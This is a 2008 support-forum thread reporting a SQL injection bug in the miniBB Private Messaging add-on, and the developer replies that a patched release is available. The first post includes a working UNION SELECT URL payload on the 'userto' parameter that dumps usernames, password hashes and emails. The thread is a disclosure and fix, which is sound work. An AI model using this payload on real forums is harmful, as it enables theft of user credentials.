miniBB Support Forums | 16 years on The Web
miniBB ® 


 | Begin | Register | Search | Statistics | File Bank | Manual |
Bugs miniBB Support Forums / Bugs /   

pMail SQL Inj Bug (userto)

Author Guest
#1 | Posted: 1 Dec 2008 23:11 
Someone just showed me this in my forum.

/index.php?userto=%27%20union%20select%20concat_ws(0x3a,username,user_password,user_email,user_icq),2%20from%20table_use rs%20 where%20user_id%20=%201--%20f&step=sendmsg&action=pmail

This shows all the users info. There is def. an sql vuln with the userto variable and maybe more.

Any quick fix would help out?

Author Paul
Lead Developer
#2 | Posted: 2 Dec 2008 03:03 | Edited by: Paul 
Thank you for reporting this bug.

Private Messaging add-on was first programmed in the era when vulnerabilities like this were not available at all. So I would agree, in some add-ons, errors like this may be still discovered, because I am unable to handle every possible hacking attempt. But during of the non-open-source nature of this add-on, they are discovered much slower then in default miniBB or free plugins.

I have updated PM add-on under customers area (version 2.3.2), so purchasers are welcome to re-download and update addon_pmail.php file.

Bugs miniBB Support Forums / Bugs /
 pMail SQL Inj Bug (userto)
 Share Topic's Link

This topic is closed. New replies are not allowed.


miniBB Support Forums Powered by Forum Software miniBB ® Home  Features  Requirements  Demo  Download  Showcase  Gallery of Arts
Compiler  Premium Extensions  Premium Support  License  Contact Us
Install the Captcha add-on: protect your miniBB-forums from the automated spam and flood.